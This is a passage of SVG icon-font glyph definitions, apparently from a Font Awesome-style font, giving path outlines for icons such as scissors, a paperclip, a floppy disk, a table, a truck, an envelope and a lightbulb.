<glyph unicode="&#xf0c4;" horiz-adv-x="1792" d="M960 640q26 0 45 -19t19 -45t-19 -45t-45 -19t-45 19t-19 45t19 45t45 19zM1260 576l507 -398q28 -20 25 -56q-5 -35 -35 -51l-128 -64q-13 -7 -29 -7q-17 0 -31 8l-690 387l-110 -66q-8 -4 -12 -5q14 -49 10 -97q-7 -77 -56 -147.5t-132 -123.5q-132 -84 -277 -84 q-136 0 -222 78q-90 84 -79 207q7 76 56 147t131 124q132 84 278 84q83 0 151 -31q9 13 22 22l122 73l-122 73q-13 9 -22 22q-68 -31 -151 -31q-146 0 -278 84q-82 53 -131 124t-56 147q-5 59 15.5 113t63.5 93q85 79 222 79q145 0 277 -84q83 -52 132 -123t56 -148 q4 -48 -10 -97q4 -1 12 -5l110 -66l690 387q14 8 31 8q16 0 29 -7l128 -64q30 -16 35 -51q3 -36 -25 -56zM579 836q46 42 21 108t-106 117q-92 59 -192 59q-74 0 -113 -36q-46 -42 -21 -108t106 -117q92 -59 192 -59q74 0 113 36zM494 91q81 51 106 117t-21 108 q-39 36 -113 36q-100 0 -192 -59q-81 -51 -106 -117t21 -108q39 -36 113 -36q100 0 192 59zM672 704l96 -58v11q0 36 33 56l14 8l-79 47l-26 -26q-3 -3 -10 -11t-12 -12q-2 -2 -4 -3.5t-3 -2.5zM896 480l96 -32l736 576l-128 64l-768 -431v-113l-160 -96l9 -8q2 -2 7 -6 q4 -4 11 -12t11 -12l26 -26zM1600 64l128 64l-520 408l-177 -138q-2 -3 -13 -7z" />
<glyph unicode="&#xf0c5;" horiz-adv-x="1792" d="M1696 1152q40 0 68 -28t28 -68v-1216q0 -40 -28 -68t-68 -28h-960q-40 0 -68 28t-28 68v288h-544q-40 0 -68 28t-28 68v672q0 40 20 88t48 76l408 408q28 28 76 48t88 20h416q40 0 68 -28t28 -68v-328q68 40 128 40h416zM1152 939l-299 -299h299v299zM512 1323l-299 -299 h299v299zM708 676l316 316v416h-384v-416q0 -40 -28 -68t-68 -28h-416v-640h512v256q0 40 20 88t48 76zM1664 -128v1152h-384v-416q0 -40 -28 -68t-68 -28h-416v-640h896z" />
<glyph unicode="&#xf0c6;" horiz-adv-x="1408" d="M1404 151q0 -117 -79 -196t-196 -79q-135 0 -235 100l-777 776q-113 115 -113 271q0 159 110 270t269 111q158 0 273 -113l605 -606q10 -10 10 -22q0 -16 -30.5 -46.5t-46.5 -30.5q-13 0 -23 10l-606 607q-79 77 -181 77q-106 0 -179 -75t-73 -181q0 -105 76 -181 l776 -777q63 -63 145 -63q64 0 106 42t42 106q0 82 -63 145l-581 581q-26 24 -60 24q-29 0 -48 -19t-19 -48q0 -32 25 -59l410 -410q10 -10 10 -22q0 -16 -31 -47t-47 -31q-12 0 -22 10l-410 410q-63 61 -63 149q0 82 57 139t139 57q88 0 149 -63l581 -581q100 -98 100 -235 z" />
<glyph unicode="&#xf0c7;" d="M384 0h768v384h-768v-384zM1280 0h128v896q0 14 -10 38.5t-20 34.5l-281 281q-10 10 -34 20t-39 10v-416q0 -40 -28 -68t-68 -28h-576q-40 0 -68 28t-28 68v416h-128v-1280h128v416q0 40 28 68t68 28h832q40 0 68 -28t28 -68v-416zM896 928v320q0 13 -9.5 22.5t-22.5 9.5 h-192q-13 0 -22.5 -9.5t-9.5 -22.5v-320q0 -13 9.5 -22.5t22.5 -9.5h192q13 0 22.5 9.5t9.5 22.5zM1536 896v-928q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1344q0 40 28 68t68 28h928q40 0 88 -20t76 -48l280 -280q28 -28 48 -76t20 -88z" />
<glyph unicode="&#xf0c8;" d="M1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf0c9;" d="M1536 192v-128q0 -26 -19 -45t-45 -19h-1408q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1408q26 0 45 -19t19 -45zM1536 704v-128q0 -26 -19 -45t-45 -19h-1408q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1408q26 0 45 -19t19 -45zM1536 1216v-128q0 -26 -19 -45 t-45 -19h-1408q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1408q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf0ca;" horiz-adv-x="1792" d="M384 128q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM384 640q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM1792 224v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1216q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5 t22.5 9.5h1216q13 0 22.5 -9.5t9.5 -22.5zM384 1152q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM1792 736v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1216q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1216q13 0 22.5 -9.5t9.5 -22.5z M1792 1248v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1216q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1216q13 0 22.5 -9.5t9.5 -22.5z" />
<glyph unicode="&#xf0cb;" horiz-adv-x="1792" d="M381 -84q0 -80 -54.5 -126t-135.5 -46q-106 0 -172 66l57 88q49 -45 106 -45q29 0 50.5 14.5t21.5 42.5q0 64 -105 56l-26 56q8 10 32.5 43.5t42.5 54t37 38.5v1q-16 0 -48.5 -1t-48.5 -1v-53h-106v152h333v-88l-95 -115q51 -12 81 -49t30 -88zM383 543v-159h-362 q-6 36 -6 54q0 51 23.5 93t56.5 68t66 47.5t56.5 43.5t23.5 45q0 25 -14.5 38.5t-39.5 13.5q-46 0 -81 -58l-85 59q24 51 71.5 79.5t105.5 28.5q73 0 123 -41.5t50 -112.5q0 -50 -34 -91.5t-75 -64.5t-75.5 -50.5t-35.5 -52.5h127v60h105zM1792 224v-192q0 -13 -9.5 -22.5 t-22.5 -9.5h-1216q-13 0 -22.5 9.5t-9.5 22.5v192q0 14 9 23t23 9h1216q13 0 22.5 -9.5t9.5 -22.5zM384 1123v-99h-335v99h107q0 41 0.5 122t0.5 121v12h-2q-8 -17 -50 -54l-71 76l136 127h106v-404h108zM1792 736v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1216q-13 0 -22.5 9.5 t-9.5 22.5v192q0 14 9 23t23 9h1216q13 0 22.5 -9.5t9.5 -22.5zM1792 1248v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1216q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1216q13 0 22.5 -9.5t9.5 -22.5z" />
<glyph unicode="&#xf0cc;" horiz-adv-x="1792" d="M1760 640q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-1728q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h1728zM483 704q-28 35 -51 80q-48 97 -48 188q0 181 134 309q133 127 393 127q50 0 167 -19q66 -12 177 -48q10 -38 21 -118q14 -123 14 -183q0 -18 -5 -45l-12 -3l-84 6 l-14 2q-50 149 -103 205q-88 91 -210 91q-114 0 -182 -59q-67 -58 -67 -146q0 -73 66 -140t279 -129q69 -20 173 -66q58 -28 95 -52h-743zM990 448h411q7 -39 7 -92q0 -111 -41 -212q-23 -55 -71 -104q-37 -35 -109 -81q-80 -48 -153 -66q-80 -21 -203 -21q-114 0 -195 23 l-140 40q-57 16 -72 28q-8 8 -8 22v13q0 108 -2 156q-1 30 0 68l2 37v44l102 2q15 -34 30 -71t22.5 -56t12.5 -27q35 -57 80 -94q43 -36 105 -57q59 -22 132 -22q64 0 139 27q77 26 122 86q47 61 47 129q0 84 -81 157q-34 29 -137 71z" />
<glyph unicode="&#xf0cd;" d="M48 1313q-37 2 -45 4l-3 88q13 1 40 1q60 0 112 -4q132 -7 166 -7q86 0 168 3q116 4 146 5q56 0 86 2l-1 -14l2 -64v-9q-60 -9 -124 -9q-60 0 -79 -25q-13 -14 -13 -132q0 -13 0.5 -32.5t0.5 -25.5l1 -229l14 -280q6 -124 51 -202q35 -59 96 -92q88 -47 177 -47 q104 0 191 28q56 18 99 51q48 36 65 64q36 56 53 114q21 73 21 229q0 79 -3.5 128t-11 122.5t-13.5 159.5l-4 59q-5 67 -24 88q-34 35 -77 34l-100 -2l-14 3l2 86h84l205 -10q76 -3 196 10l18 -2q6 -38 6 -51q0 -7 -4 -31q-45 -12 -84 -13q-73 -11 -79 -17q-15 -15 -15 -41 q0 -7 1.5 -27t1.5 -31q8 -19 22 -396q6 -195 -15 -304q-15 -76 -41 -122q-38 -65 -112 -123q-75 -57 -182 -89q-109 -33 -255 -33q-167 0 -284 46q-119 47 -179 122q-61 76 -83 195q-16 80 -16 237v333q0 188 -17 213q-25 36 -147 39zM1536 -96v64q0 14 -9 23t-23 9h-1472 q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h1472q14 0 23 9t9 23z" />
<glyph unicode="&#xf0ce;" horiz-adv-x="1664" d="M512 160v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM512 544v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM1024 160v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23 v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM512 928v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM1024 544v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM1536 160v192 q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM1024 928v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM1536 544v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-192 q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM1536 928v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM1664 1248v-1088q0 -66 -47 -113t-113 -47h-1344q-66 0 -113 47t-47 113v1088q0 66 47 113t113 47h1344q66 0 113 -47t47 -113 z" />
<glyph unicode="&#xf0d0;" horiz-adv-x="1664" d="M1190 955l293 293l-107 107l-293 -293zM1637 1248q0 -27 -18 -45l-1286 -1286q-18 -18 -45 -18t-45 18l-198 198q-18 18 -18 45t18 45l1286 1286q18 18 45 18t45 -18l198 -198q18 -18 18 -45zM286 1438l98 -30l-98 -30l-30 -98l-30 98l-98 30l98 30l30 98zM636 1276 l196 -60l-196 -60l-60 -196l-60 196l-196 60l196 60l60 196zM1566 798l98 -30l-98 -30l-30 -98l-30 98l-98 30l98 30l30 98zM926 1438l98 -30l-98 -30l-30 -98l-30 98l-98 30l98 30l30 98z" />
<glyph unicode="&#xf0d1;" horiz-adv-x="1792" d="M640 128q0 52 -38 90t-90 38t-90 -38t-38 -90t38 -90t90 -38t90 38t38 90zM256 640h384v256h-158q-13 0 -22 -9l-195 -195q-9 -9 -9 -22v-30zM1536 128q0 52 -38 90t-90 38t-90 -38t-38 -90t38 -90t90 -38t90 38t38 90zM1792 1216v-1024q0 -15 -4 -26.5t-13.5 -18.5 t-16.5 -11.5t-23.5 -6t-22.5 -2t-25.5 0t-22.5 0.5q0 -106 -75 -181t-181 -75t-181 75t-75 181h-384q0 -106 -75 -181t-181 -75t-181 75t-75 181h-64q-3 0 -22.5 -0.5t-25.5 0t-22.5 2t-23.5 6t-16.5 11.5t-13.5 18.5t-4 26.5q0 26 19 45t45 19v320q0 8 -0.5 35t0 38 t2.5 34.5t6.5 37t14 30.5t22.5 30l198 198q19 19 50.5 32t58.5 13h160v192q0 26 19 45t45 19h1024q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf0d2;" d="M1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103q-111 0 -218 32q59 93 78 164q9 34 54 211q20 -39 73 -67.5t114 -28.5q121 0 216 68.5t147 188.5t52 270q0 114 -59.5 214t-172.5 163t-255 63q-105 0 -196 -29t-154.5 -77t-109 -110.5t-67 -129.5t-21.5 -134 q0 -104 40 -183t117 -111q30 -12 38 20q2 7 8 31t8 30q6 23 -11 43q-51 61 -51 151q0 151 104.5 259.5t273.5 108.5q151 0 235.5 -82t84.5 -213q0 -170 -68.5 -289t-175.5 -119q-61 0 -98 43.5t-23 104.5q8 35 26.5 93.5t30 103t11.5 75.5q0 50 -27 83t-77 33 q-62 0 -105 -57t-43 -142q0 -73 25 -122l-99 -418q-17 -70 -13 -177q-206 91 -333 281t-127 423q0 209 103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf0d3;" d="M1248 1408q119 0 203.5 -84.5t84.5 -203.5v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-725q85 122 108 210q9 34 53 209q21 -39 73.5 -67t112.5 -28q181 0 295.5 147.5t114.5 373.5q0 84 -35 162.5t-96.5 139t-152.5 97t-197 36.5q-104 0 -194.5 -28.5t-153 -76.5 t-107.5 -109.5t-66.5 -128t-21.5 -132.5q0 -102 39.5 -180t116.5 -110q13 -5 23.5 0t14.5 19q10 44 15 61q6 23 -11 42q-50 62 -50 150q0 150 103.5 256.5t270.5 106.5q149 0 232.5 -81t83.5 -210q0 -168 -67.5 -286t-173.5 -118q-60 0 -97 43.5t-23 103.5q8 34 26.5 92.5 t29.5 102t11 74.5q0 49 -26.5 81.5t-75.5 32.5q-61 0 -103.5 -56.5t-42.5 -139.5q0 -72 24 -121l-98 -414q-24 -100 -7 -254h-183q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960z" />
<glyph unicode="&#xf0d4;" d="M917 631q0 26 -6 64h-362v-132h217q-3 -24 -16.5 -50t-37.5 -53t-66.5 -44.5t-96.5 -17.5q-99 0 -169 71t-70 171t70 171t169 71q92 0 153 -59l104 101q-108 100 -257 100q-160 0 -272 -112.5t-112 -271.5t112 -271.5t272 -112.5q165 0 266.5 105t101.5 270zM1262 585 h109v110h-109v110h-110v-110h-110v-110h110v-110h110v110zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf0d5;" horiz-adv-x="2304" d="M1437 623q0 -208 -87 -370.5t-248 -254t-369 -91.5q-149 0 -285 58t-234 156t-156 234t-58 285t58 285t156 234t234 156t285 58q286 0 491 -192l-199 -191q-117 113 -292 113q-123 0 -227.5 -62t-165.5 -168.5t-61 -232.5t61 -232.5t165.5 -168.5t227.5 -62 q83 0 152.5 23t114.5 57.5t78.5 78.5t49 83t21.5 74h-416v252h692q12 -63 12 -122zM2304 745v-210h-209v-209h-210v209h-209v210h209v209h210v-209h209z" />
<glyph unicode="&#xf0d6;" horiz-adv-x="1920" d="M768 384h384v96h-128v448h-114l-148 -137l77 -80q42 37 55 57h2v-288h-128v-96zM1280 640q0 -70 -21 -142t-59.5 -134t-101.5 -101t-138 -39t-138 39t-101.5 101t-59.5 134t-21 142t21 142t59.5 134t101.5 101t138 39t138 -39t101.5 -101t59.5 -134t21 -142zM1792 384 v512q-106 0 -181 75t-75 181h-1152q0 -106 -75 -181t-181 -75v-512q106 0 181 -75t75 -181h1152q0 106 75 181t181 75zM1920 1216v-1152q0 -26 -19 -45t-45 -19h-1792q-26 0 -45 19t-19 45v1152q0 26 19 45t45 19h1792q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf0d7;" horiz-adv-x="1024" d="M1024 832q0 -26 -19 -45l-448 -448q-19 -19 -45 -19t-45 19l-448 448q-19 19 -19 45t19 45t45 19h896q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf0d8;" horiz-adv-x="1024" d="M1024 320q0 -26 -19 -45t-45 -19h-896q-26 0 -45 19t-19 45t19 45l448 448q19 19 45 19t45 -19l448 -448q19 -19 19 -45z" />
<glyph unicode="&#xf0d9;" horiz-adv-x="640" d="M640 1088v-896q0 -26 -19 -45t-45 -19t-45 19l-448 448q-19 19 -19 45t19 45l448 448q19 19 45 19t45 -19t19 -45z" />
<glyph unicode="&#xf0da;" horiz-adv-x="640" d="M576 640q0 -26 -19 -45l-448 -448q-19 -19 -45 -19t-45 19t-19 45v896q0 26 19 45t45 19t45 -19l448 -448q19 -19 19 -45z" />
<glyph unicode="&#xf0db;" horiz-adv-x="1664" d="M160 0h608v1152h-640v-1120q0 -13 9.5 -22.5t22.5 -9.5zM1536 32v1120h-640v-1152h608q13 0 22.5 9.5t9.5 22.5zM1664 1248v-1216q0 -66 -47 -113t-113 -47h-1344q-66 0 -113 47t-47 113v1216q0 66 47 113t113 47h1344q66 0 113 -47t47 -113z" />
<glyph unicode="&#xf0dc;" horiz-adv-x="1024" d="M1024 448q0 -26 -19 -45l-448 -448q-19 -19 -45 -19t-45 19l-448 448q-19 19 -19 45t19 45t45 19h896q26 0 45 -19t19 -45zM1024 832q0 -26 -19 -45t-45 -19h-896q-26 0 -45 19t-19 45t19 45l448 448q19 19 45 19t45 -19l448 -448q19 -19 19 -45z" />
<glyph unicode="&#xf0dd;" horiz-adv-x="1024" d="M1024 448q0 -26 -19 -45l-448 -448q-19 -19 -45 -19t-45 19l-448 448q-19 19 -19 45t19 45t45 19h896q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf0de;" horiz-adv-x="1024" d="M1024 832q0 -26 -19 -45t-45 -19h-896q-26 0 -45 19t-19 45t19 45l448 448q19 19 45 19t45 -19l448 -448q19 -19 19 -45z" />
<glyph unicode="&#xf0e0;" horiz-adv-x="1792" d="M1792 826v-794q0 -66 -47 -113t-113 -47h-1472q-66 0 -113 47t-47 113v794q44 -49 101 -87q362 -246 497 -345q57 -42 92.5 -65.5t94.5 -48t110 -24.5h1h1q51 0 110 24.5t94.5 48t92.5 65.5q170 123 498 345q57 39 100 87zM1792 1120q0 -79 -49 -151t-122 -123 q-376 -261 -468 -325q-10 -7 -42.5 -30.5t-54 -38t-52 -32.5t-57.5 -27t-50 -9h-1h-1q-23 0 -50 9t-57.5 27t-52 32.5t-54 38t-42.5 30.5q-91 64 -262 182.5t-205 142.5q-62 42 -117 115.5t-55 136.5q0 78 41.5 130t118.5 52h1472q65 0 112.5 -47t47.5 -113z" />
<glyph unicode="&#xf0e1;" d="M349 911v-991h-330v991h330zM370 1217q1 -73 -50.5 -122t-135.5 -49h-2q-82 0 -132 49t-50 122q0 74 51.5 122.5t134.5 48.5t133 -48.5t51 -122.5zM1536 488v-568h-329v530q0 105 -40.5 164.5t-126.5 59.5q-63 0 -105.5 -34.5t-63.5 -85.5q-11 -30 -11 -81v-553h-329 q2 399 2 647t-1 296l-1 48h329v-144h-2q20 32 41 56t56.5 52t87 43.5t114.5 15.5q171 0 275 -113.5t104 -332.5z" />
<glyph unicode="&#xf0e2;" d="M1536 640q0 -156 -61 -298t-164 -245t-245 -164t-298 -61q-172 0 -327 72.5t-264 204.5q-7 10 -6.5 22.5t8.5 20.5l137 138q10 9 25 9q16 -2 23 -12q73 -95 179 -147t225 -52q104 0 198.5 40.5t163.5 109.5t109.5 163.5t40.5 198.5t-40.5 198.5t-109.5 163.5 t-163.5 109.5t-198.5 40.5q-98 0 -188 -35.5t-160 -101.5l137 -138q31 -30 14 -69q-17 -40 -59 -40h-448q-26 0 -45 19t-19 45v448q0 42 40 59q39 17 69 -14l130 -129q107 101 244.5 156.5t284.5 55.5q156 0 298 -61t245 -164t164 -245t61 -298z" />
<glyph unicode="&#xf0e3;" horiz-adv-x="1792" d="M1771 0q0 -53 -37 -90l-107 -108q-39 -37 -91 -37q-53 0 -90 37l-363 364q-38 36 -38 90q0 53 43 96l-256 256l-126 -126q-14 -14 -34 -14t-34 14q2 -2 12.5 -12t12.5 -13t10 -11.5t10 -13.5t6 -13.5t5.5 -16.5t1.5 -18q0 -38 -28 -68q-3 -3 -16.5 -18t-19 -20.5 t-18.5 -16.5t-22 -15.5t-22 -9t-26 -4.5q-40 0 -68 28l-408 408q-28 28 -28 68q0 13 4.5 26t9 22t15.5 22t16.5 18.5t20.5 19t18 16.5q30 28 68 28q10 0 18 -1.5t16.5 -5.5t13.5 -6t13.5 -10t11.5 -10t13 -12.5t12 -12.5q-14 14 -14 34t14 34l348 348q14 14 34 14t34 -14 q-2 2 -12.5 12t-12.5 13t-10 11.5t-10 13.5t-6 13.5t-5.5 16.5t-1.5 18q0 38 28 68q3 3 16.5 18t19 20.5t18.5 16.5t22 15.5t22 9t26 4.5q40 0 68 -28l408 -408q28 -28 28 -68q0 -13 -4.5 -26t-9 -22t-15.5 -22t-16.5 -18.5t-20.5 -19t-18 -16.5q-30 -28 -68 -28 q-10 0 -18 1.5t-16.5 5.5t-13.5 6t-13.5 10t-11.5 10t-13 12.5t-12 12.5q14 -14 14 -34t-14 -34l-126 -126l256 -256q43 43 96 43q52 0 91 -37l363 -363q37 -39 37 -91z" />
<glyph unicode="&#xf0e4;" horiz-adv-x="1792" d="M384 384q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM576 832q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1004 351l101 382q6 26 -7.5 48.5t-38.5 29.5 t-48 -6.5t-30 -39.5l-101 -382q-60 -5 -107 -43.5t-63 -98.5q-20 -77 20 -146t117 -89t146 20t89 117q16 60 -6 117t-72 91zM1664 384q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1024 1024q0 53 -37.5 90.5 t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1472 832q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1792 384q0 -261 -141 -483q-19 -29 -54 -29h-1402q-35 0 -54 29 q-141 221 -141 483q0 182 71 348t191 286t286 191t348 71t348 -71t286 -191t191 -286t71 -348z" />
<glyph unicode="&#xf0e5;" horiz-adv-x="1792" d="M896 1152q-204 0 -381.5 -69.5t-282 -187.5t-104.5 -255q0 -112 71.5 -213.5t201.5 -175.5l87 -50l-27 -96q-24 -91 -70 -172q152 63 275 171l43 38l57 -6q69 -8 130 -8q204 0 381.5 69.5t282 187.5t104.5 255t-104.5 255t-282 187.5t-381.5 69.5zM1792 640 q0 -174 -120 -321.5t-326 -233t-450 -85.5q-70 0 -145 8q-198 -175 -460 -242q-49 -14 -114 -22h-5q-15 0 -27 10.5t-16 27.5v1q-3 4 -0.5 12t2 10t4.5 9.5l6 9t7 8.5t8 9q7 8 31 34.5t34.5 38t31 39.5t32.5 51t27 59t26 76q-157 89 -247.5 220t-90.5 281q0 174 120 321.5 t326 233t450 85.5t450 -85.5t326 -233t120 -321.5z" />
<glyph unicode="&#xf0e6;" horiz-adv-x="1792" d="M704 1152q-153 0 -286 -52t-211.5 -141t-78.5 -191q0 -82 53 -158t149 -132l97 -56l-35 -84q34 20 62 39l44 31l53 -10q78 -14 153 -14q153 0 286 52t211.5 141t78.5 191t-78.5 191t-211.5 141t-286 52zM704 1280q191 0 353.5 -68.5t256.5 -186.5t94 -257t-94 -257 t-256.5 -186.5t-353.5 -68.5q-86 0 -176 16q-124 -88 -278 -128q-36 -9 -86 -16h-3q-11 0 -20.5 8t-11.5 21q-1 3 -1 6.5t0.5 6.5t2 6l2.5 5t3.5 5.5t4 5t4.5 5t4 4.5q5 6 23 25t26 29.5t22.5 29t25 38.5t20.5 44q-124 72 -195 177t-71 224q0 139 94 257t256.5 186.5 t353.5 68.5zM1526 111q10 -24 20.5 -44t25 -38.5t22.5 -29t26 -29.5t23 -25q1 -1 4 -4.5t4.5 -5t4 -5t3.5 -5.5l2.5 -5t2 -6t0.5 -6.5t-1 -6.5q-3 -14 -13 -22t-22 -7q-50 7 -86 16q-154 40 -278 128q-90 -16 -176 -16q-271 0 -472 132q58 -4 88 -4q161 0 309 45t264 129 q125 92 192 212t67 254q0 77 -23 152q129 -71 204 -178t75 -230q0 -120 -71 -224.5t-195 -176.5z" />
<glyph unicode="&#xf0e7;" horiz-adv-x="896" d="M885 970q18 -20 7 -44l-540 -1157q-13 -25 -42 -25q-4 0 -14 2q-17 5 -25.5 19t-4.5 30l197 808l-406 -101q-4 -1 -12 -1q-18 0 -31 11q-18 15 -13 39l201 825q4 14 16 23t28 9h328q19 0 32 -12.5t13 -29.5q0 -8 -5 -18l-171 -463l396 98q8 2 12 2q19 0 34 -15z" />
<glyph unicode="&#xf0e8;" horiz-adv-x="1792" d="M1792 288v-320q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v320q0 40 28 68t68 28h96v192h-512v-192h96q40 0 68 -28t28 -68v-320q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v320q0 40 28 68t68 28h96v192h-512v-192h96q40 0 68 -28t28 -68v-320 q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v320q0 40 28 68t68 28h96v192q0 52 38 90t90 38h512v192h-96q-40 0 -68 28t-28 68v320q0 40 28 68t68 28h320q40 0 68 -28t28 -68v-320q0 -40 -28 -68t-68 -28h-96v-192h512q52 0 90 -38t38 -90v-192h96q40 0 68 -28t28 -68 z" />
<glyph unicode="&#xf0e9;" horiz-adv-x="1664" d="M896 708v-580q0 -104 -76 -180t-180 -76t-180 76t-76 180q0 26 19 45t45 19t45 -19t19 -45q0 -50 39 -89t89 -39t89 39t39 89v580q33 11 64 11t64 -11zM1664 681q0 -13 -9.5 -22.5t-22.5 -9.5q-11 0 -23 10q-49 46 -93 69t-102 23q-68 0 -128 -37t-103 -97 q-7 -10 -17.5 -28t-14.5 -24q-11 -17 -28 -17q-18 0 -29 17q-4 6 -14.5 24t-17.5 28q-43 60 -102.5 97t-127.5 37t-127.5 -37t-102.5 -97q-7 -10 -17.5 -28t-14.5 -24q-11 -17 -29 -17q-17 0 -28 17q-4 6 -14.5 24t-17.5 28q-43 60 -103 97t-128 37q-58 0 -102 -23t-93 -69 q-12 -10 -23 -10q-13 0 -22.5 9.5t-9.5 22.5q0 5 1 7q45 183 172.5 319.5t298 204.5t360.5 68q140 0 274.5 -40t246.5 -113.5t194.5 -187t115.5 -251.5q1 -2 1 -7zM896 1408v-98q-42 2 -64 2t-64 -2v98q0 26 19 45t45 19t45 -19t19 -45z" />
<glyph unicode="&#xf0ea;" horiz-adv-x="1792" d="M768 -128h896v640h-416q-40 0 -68 28t-28 68v416h-384v-1152zM1024 1312v64q0 13 -9.5 22.5t-22.5 9.5h-704q-13 0 -22.5 -9.5t-9.5 -22.5v-64q0 -13 9.5 -22.5t22.5 -9.5h704q13 0 22.5 9.5t9.5 22.5zM1280 640h299l-299 299v-299zM1792 512v-672q0 -40 -28 -68t-68 -28 h-960q-40 0 -68 28t-28 68v160h-544q-40 0 -68 28t-28 68v1344q0 40 28 68t68 28h1088q40 0 68 -28t28 -68v-328q21 -13 36 -28l408 -408q28 -28 48 -76t20 -88z" />
<glyph unicode="&#xf0eb;" horiz-adv-x="1024" d="M736 960q0 -13 -9.5 -22.5t-22.5 -9.5t-22.5 9.5t-9.5 22.5q0 46 -54 71t-106 25q-13 0 -22.5 9.5t-9.5 22.5t9.5 22.5t22.5 9.5q50 0 99.5 -16t87 -54t37.5 -90zM896 960q0 72 -34.5 134t-90 101.5t-123 62t-136.5 22.5t-136.5 -22.5t-123 -62t-90 -101.5t-34.5 -134 q0 -101 68 -180q10 -11 30.5 -33t30.5 -33q128 -153 141 -298h228q13 145 141 298q10 11 30.5 33t30.5 33q68 79 68 180zM1024 960q0 -155 -103 -268q-45 -49 -74.5 -87t-59.5 -95.5t-34 -107.5q47 -28 47 -82q0 -37 -25 -64q25 -27 25 -64q0 -52 -45 -81q13 -23 13 -47 q0 -46 -31.5 -71t-77.5 -25q-20 -44 -60 -70t-87 -26t-87 26t-60 70q-46 0 -77.5 25t-31.5 71q0 24 13 47q-45 29 -45 81q0 37 25 64q-25 27 -25 64q0 54 47 82q-4 50 -34 107.5t-59.5 95.5t-74.5 87q-103 113 -103 268q0 99 44.5 184.5t117 142t164 89t186.5 32.5 t186.5 -32.5t164 -89t117 -142t44.5 -184.5z" />
